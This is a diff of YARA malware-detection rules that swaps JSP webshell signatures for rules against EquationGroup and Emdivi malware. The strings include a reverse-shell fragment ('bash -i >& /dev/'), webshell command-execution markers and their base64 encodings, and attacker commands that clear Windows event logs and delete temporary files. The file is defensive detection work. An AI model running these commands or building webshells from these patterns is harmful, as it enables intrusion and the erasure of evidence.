-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cbb90005-d8f8-5c64-85d1-29e466f48c25"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "https://github.com/sensepost/reGeorg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5506-L5556"
+		description = "EquationGroup Malware - file EventLogEdit_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40239dd0-4159-5c10-96b3-4f1e28c92d97"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1836-L1851"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
-		hash = "650eaa21f4031d7da591ebb68e9fc5ce5c860689"
-		hash = "00c86bf6ce026ccfaac955840d18391fbff5c933"
-		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
-		hash = "9108a33058aa9a2fb6118b719c5b1318f33f0989"
-		logic_hash = "9d4c60a4daaadf6cefe8bf1d84b1e4af491cd23136332db4a022715b265c8f4e"
+		logic_hash = "1d391eaed77150ab2a26dfed60ebd82aa2c6802b6b604791fb78d08db7fe5ec9"
 		score = 75
-		quality = 50
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "0bb750195fbd93d174c2a8e20bcbcae4efefc881f7961fdca8fa6ebd68ac1edf"
 
 	strings:
-		$jgeorg1 = "request" fullword wide ascii
-		$jgeorg2 = "getHeader" fullword wide ascii
-		$jgeorg3 = "X-CMD" fullword wide ascii
-		$jgeorg4 = "X-STATUS" fullword wide ascii
-		$jgeorg5 = "socket" fullword wide ascii
-		$jgeorg6 = "FORWARD" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\%ls" fullword wide
+		$s2 = "Ntdll.dll" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
 
 	condition:
-		filesize < 300KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jgeorg* )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_HTTP_Proxy : FILE
+rule SIGNATURE_BASE_Equationgroup_Portmap_Lp : FILE
 {
 	meta:
-		description = "Webshell JSP HTTP proxy"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "55be246e-30a8-52ed-bc5f-507e63bbfe16"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5558-L5606"
+		description = "EquationGroup Malware - file PortMap_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1851a17-9858-5c93-9993-2da0559e5d2e"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1853-L1868"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2f9b647660923c5262636a5344e2665512a947a4"
-		hash = "97c1e2bf7e769d3fc94ae2fc74ac895f669102c6"
-		hash = "2f9b647660923c5262636a5344e2665512a947a4"
-		logic_hash = "7183902d43fc633db06a41b4a6bc02d2eb5662b7ee08080b57563783b8b67568"
+		logic_hash = "9666e64b40dc01c5b3756b1334519730765f7075ba9a124a79f5b7ea4bc91e03"
 		score = 75
-		quality = 50
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
 
 	strings:
-		$jh1 = "OutputStream" fullword wide ascii
-		$jh2 = "InputStream" wide ascii
-		$jh3 = "BufferedReader" fullword wide ascii
-		$jh4 = "HttpRequest" fullword wide ascii
-		$jh5 = "openConnection" fullword wide ascii
-		$jh6 = "getParameter" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s1 = "Privilege elevation failed" fullword wide
+		$s2 = "Portmap ended due to max number of ports" fullword wide
+		$s3 = "Invalid parameters received for portmap" fullword wide
 
 	condition:
-		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jh* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Writer_Nano : FILE
+rule SIGNATURE_BASE_Equationgroup_Processoptions_Lp : FILE
 {
 	meta:
-		description = "JSP file writer"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "422a18f2-d6d4-5b42-be15-1eafe44e01cf"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5608-L5689"
+		description = "EquationGroup Malware - file ProcessOptions_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5ccb9751-fbcc-538c-8d55-dfc495067ce5"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1870-L1883"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ac91e5b9b9dcd373eaa9360a51aa661481ab9429"
-		hash = "c718c885b5d6e29161ee8ea0acadb6e53c556513"
-		hash = "9f1df0249a6a491cdd5df598d83307338daa4c43"
-		hash = "5e241d9d3a045d3ade7b6ff6af6c57b149fa356e"
-		logic_hash = "44c11570c610b849ba9c7506fd9ef3575d270e79d7aaf5c26d54ab3f64cfc94f"
+		logic_hash = "cc9cd566f57d28ccea6d53d2eba71187f01cdf6e140771cace33349f6439461d"
 		score = 75
-		quality = 48
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
 
 	strings:
-		$payload1 = ".write" wide ascii
-		$payload2 = "getBytes" fullword wide ascii
-		$payload3 = ".decodeBuffer" wide ascii
-		$payload4 = "FileOutputStream" fullword wide ascii
-		$logger1 = "getLogger" fullword ascii wide
-		$logger2 = "FileHandler" fullword ascii wide
-		$logger3 = "addHandler" fullword ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$jw_sus1 = /getParameter\("."\)/ ascii wide
-		$jw_sus4 = "yoco" fullword ascii wide
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
+		$s1 = "Invalid parameter received by implant" fullword wide
 
 	condition:
-		( any of ( $input* ) and any of ( $req* ) ) and ( filesize < 200 or ( filesize < 1000 and any of ( $jw_sus* ) ) ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( 2 of ( $payload* ) or all of ( $logger* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_EXT_WEBSHELL_JSP_Generic_Tiny : FILE
+rule SIGNATURE_BASE_Equationgroup_Passfreely_Lp : FILE
 {
 	meta:
-		description = "Generic JSP webshell tiny"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fad14524-de44-52ea-95e6-3e5de3138926"
-		date = "2021-01-07"
-		modified = "2024-12-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5691-L5776"
+		description = "EquationGroup Malware - file PassFreely_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5fb99194-f0df-54aa-9f20-7f8458155e62"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1885-L1900"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8fd343db0442136e693e745d7af1018a99b042af"
-		hash = "87c3ac9b75a72187e8bc6c61f50659435dbdc4fde6ed720cebb93881ba5989d8"
-		hash = "1aa6af726137bf261849c05d18d0a630d95530588832aadd5101af28acc034b5"
-		logic_hash = "a6bf86961bc07b312fc24362d70d22ce826a2e918e1e0e8679bd415783d8500a"
+		logic_hash = "c3ceb04b42b6e741b1578ec9ecb83b72c599d9af457d6d4e8de572e481d3aa5c"
 		score = 75
-		quality = 48
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
 
 	strings:
-		$payload1 = "ProcessBuilder" fullword wide ascii
-		$payload2 = "URLClassLoader" fullword wide ascii
-		$payload_rt1 = "Runtime" fullword wide ascii
-		$payload_rt2 = "getRuntime" fullword wide ascii
-		$payload_rt3 = "exec" fullword wide ascii
-		$jg_sus1 = "xe /c" ascii wide
-		$jg_sus2 = /getParameter\("."\)/ ascii wide
-		$jg_sus3 = "</pre>" ascii wide
-		$jg_sus4 = "BASE64Decoder" fullword ascii wide
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$fixed_cmd1 = "bash -i >& /dev/" ascii wide
-		$fp1 = "Find Security Bugs is a plugin that aims to help security audit.</Details>"
+		$s1 = "Unexpected value in memory.  Run the 'CheckOracle' or 'memcheck' command to identify the problem" fullword wide
+		$s2 = "Oracle process memory successfully modified!" fullword wide
+		$s3 = "Unable to reset the memory protection mask to the memory" fullword wide
 
 	condition:
-		(( filesize < 1000 and any of ( $jg_sus* ) ) or filesize < 250 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( ( any of ( $input* ) and any of ( $req* ) ) or ( any of ( $fixed_cmd* ) ) ) and ( 1 of ( $payload* ) or all of ( $payload_rt* ) ) and not any of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_1 : FILE
 {
 	meta:
-		description = "Generic JSP webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7535ade8-fc65-5558-a72c-cc14c3306390"
-		date = "2021-01-07"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5778-L5870"
+		description = "EquationGroup Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "331d7ba5-e3fa-5ab7-b4de-c7af764be03d"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1904-L1933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4762f36ca01fb9cda2ab559623d2206f401fc0b1"
-		hash = "bdaf9279b3d9e07e955d0ce706d9c42e4bdf9aa1"
-		hash = "ee9408eb923f2d16f606a5aaac7e16b009797a07"
-		logic_hash = "8b525fea9a424c3e555e9aa38a587d5936a49022db73094a17cb92fd723074f3"
+		logic_hash = "97fe69f0c8f2fc44fdcd796c9390c3912f31c56540af1ca8f2baab16d1e91add"
 		score = 75
-		quality = -49
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "694be2698bcc5c7a1cce11f8ef65c1c96a883d14b98148c36b32888fb58b6a7e"
+		hash2 = "73d1d55493886639c619e9f5e312daab93e4feeb74f24dbe51593842baac8d15"
+		hash3 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
+		hash4 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+		hash5 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
+		hash6 = "8f5b97124de9fce16e2cfecb7dd2e171824c9e07546db7b3bee7c5f2c92ceda9"
+		hash7 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
+		hash8 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
+		hash9 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
+		hash10 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
+		hash11 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
+		hash12 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
+		hash13 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
+		hash14 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
+		hash15 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$susp0 = "cmd" fullword nocase ascii wide
-		$susp1 = "command" fullword nocase ascii wide
-		$susp2 = "shell" fullword nocase ascii wide
-		$susp3 = "download" fullword nocase ascii wide
-		$susp4 = "upload" fullword nocase ascii wide
-		$susp5 = "Execute" fullword nocase ascii wide
-		$susp6 = "\"pwd\"" ascii wide
-		$susp7 = "\"</pre>" ascii wide
-		$susp8 = /\\u00\d\d\\u00\d\d\\u00\d\d\\u00\d\d/ ascii wide
-		$susp9 = "*/\\u00" ascii wide
-		$fp1 = "command = \"cmd.exe /c set\";"
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$payload1 = "ProcessBuilder" fullword ascii wide
-		$payload2 = "processCmd" fullword ascii wide
-		$rt_payload1 = "Runtime" fullword ascii wide
-		$rt_payload2 = "getRuntime" fullword ascii wide
-		$rt_payload3 = "exec" fullword ascii wide
+		$x1 = "Injection Lib -  GetProcAddress failed on Kernel32.DLL function" fullword wide
+		$x2 = "Injection Lib -  JUMPUP failed to open requested process" fullword wide
 
 	condition:
-		filesize < 300KB and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) and not any of ( $fp* ) and any of ( $susp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Base64 : FILE
+
+rule SIGNATURE_BASE_Equationdrug_MS_Identifier
 {
 	meta:
-		description = "Generic JSP webshell with base64 encoded payload"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2eabbad2-7d10-573a-9120-b9b763fa2352"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5872-L5947"
+		description = "Microsoft Identifier used in EquationDrug Platform"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "c934c117-bf5a-5688-acd9-5d6c6aacd6bc"
+		date = "2015-03-11"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1937-L1948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8b5fe53f8833df3657ae2eeafb4fd101c05f0db0"
-		hash = "1b916afdd415dfa4e77cecf47321fd676ba2184d"
-		logic_hash = "fc05f90bec7ec97e6369481a0d25bc12772cba15d3ec9bac2944571b4b5c927f"
+		logic_hash = "7b919c82b6e765be5adb927bf79d13f9b37a214a6f8a1f7b237a88ba46ae958c"
 		score = 75
-		quality = 48
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$one1 = "SdW50aW1l" wide ascii
-		$one2 = "J1bnRpbW" wide ascii
-		$one3 = "UnVudGltZ" wide ascii
-		$one4 = "IAdQBuAHQAaQBtAGUA" wide ascii
-		$one5 = "SAHUAbgB0AGkAbQBlA" wide ascii
-		$one6 = "UgB1AG4AdABpAG0AZQ" wide ascii
-		$two1 = "leGVj" wide ascii
-		$two2 = "V4ZW" wide ascii
-		$two3 = "ZXhlY" wide ascii
-		$two4 = "UAeABlAGMA" wide ascii
-		$two5 = "lAHgAZQBjA" wide ascii
-		$two6 = "ZQB4AGUAYw" wide ascii
-		$three1 = "TY3JpcHRFbmdpbmVGYWN0b3J5" wide ascii
-		$three2 = "NjcmlwdEVuZ2luZUZhY3Rvcn" wide ascii
-		$three3 = "U2NyaXB0RW5naW5lRmFjdG9ye" wide ascii
-		$three4 = "MAYwByAGkAcAB0AEUAbgBnAGkAbgBlAEYAYQBjAHQAbwByAHkA" wide ascii
-		$three5 = "TAGMAcgBpAHAAdABFAG4AZwBpAG4AZQBGAGEAYwB0AG8AcgB5A" wide ascii
-		$three6 = "UwBjAHIAaQBwAHQARQBuAGcAaQBuAGUARgBhAGMAdABvAHIAeQ" wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s1 = "Microsoft(R) Windows (TM) Operating System" fullword wide
 
 	condition:
-		($cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and filesize < 300KB and ( any of ( $one* ) and any of ( $two* ) or any of ( $three* ) )
+		$s1 and pe.timestamp > 946684800
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Processbuilder : FILE
+rule SIGNATURE_BASE_Emdivi_SFX : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses processbuilder to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2a7c5f44-24a1-5f43-996e-945c209b79b1"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5949-L5986"
+		description = "Detects Emdivi malware in SFX Archive"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "51367190-2e8d-507c-a19f-996bc6960977"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L9-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "82198670ac2072cd5c2853d59dcd0f8dfcc28923"
-		hash = "c05a520d96e4ebf9eb5c73fc0fa446ceb5caf343"
-		hash = "347a55c174ee39ec912d9107e971d740f3208d53af43ea480f502d177106bbe8"
-		hash = "d0ba29b646274e8cda5be1b940a38d248880d9e2bba11d994d4392c80d6b65bd"
-		logic_hash = "fffc173cc23e158e319e48097243a64da232151e441c39e4b6ecc2565a82d862"
-		score = 75
+		logic_hash = "3257983c64c52f36b04e3fe7b12180a37531338349137d4df00fc6f704557b2e"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
+		hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
 
 	strings:
-		$exec = "ProcessBuilder" fullword wide ascii
-		$start = "start" fullword wide ascii
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$x1 = "Setup=unsecess.exe" fullword ascii
+		$x2 = "Setup=leassnp.exe" fullword ascii
+		$s1 = "&Enter password for the encrypted file:" fullword wide
+		$s2 = ";The comment below contains SFX script commands" fullword ascii
+		$s3 = "Path=%temp%" fullword ascii
 
 	condition:
-		filesize < 2000 and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $start
+		uint16( 0 ) == 0x5a4d and filesize < 740KB and ( 1 of ( $x* ) and all of ( $s* ) )
 }
+rule SIGNATURE_BASE_Emdivi_Gen1 : FILE
+{
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "807cf3f9-4f58-5d22-88b2-9adb7866979f"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L32-L60"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "e1895926f6327bf301b8618f9162cacb30ad96f181f197559d399675e2cd93c6"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		super_rule = 1
+		hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
 
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Reflection : FILE
+	strings:
+		$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
+		$x2 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
+		$x3 = "userControl-v80.exe" fullword ascii
+		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
+		$s2 = "http://www.msftncsi.com" fullword wide
+		$s3 = "net use | find /i \"c$\"" fullword wide
+		$s4 = " /del /y & " fullword wide
+		$s5 = "\\auto.cfg" wide
+		$s6 = "/ncsi.txt" fullword wide
+		$s7 = "Dcmd /c" fullword wide
+		$s8 = "/PROXY" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+rule SIGNATURE_BASE_Emdivi_Gen2 : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses reflection to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "806ffc8b-1dc8-5e28-ae94-12ad3fee18cd"
-		date = "2021-01-07"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L5988-L6070"
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "9a77c85c-84b0-5e0f-93bc-e17e2aaec095"
+		date = "2015-08-20"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L62-L85"
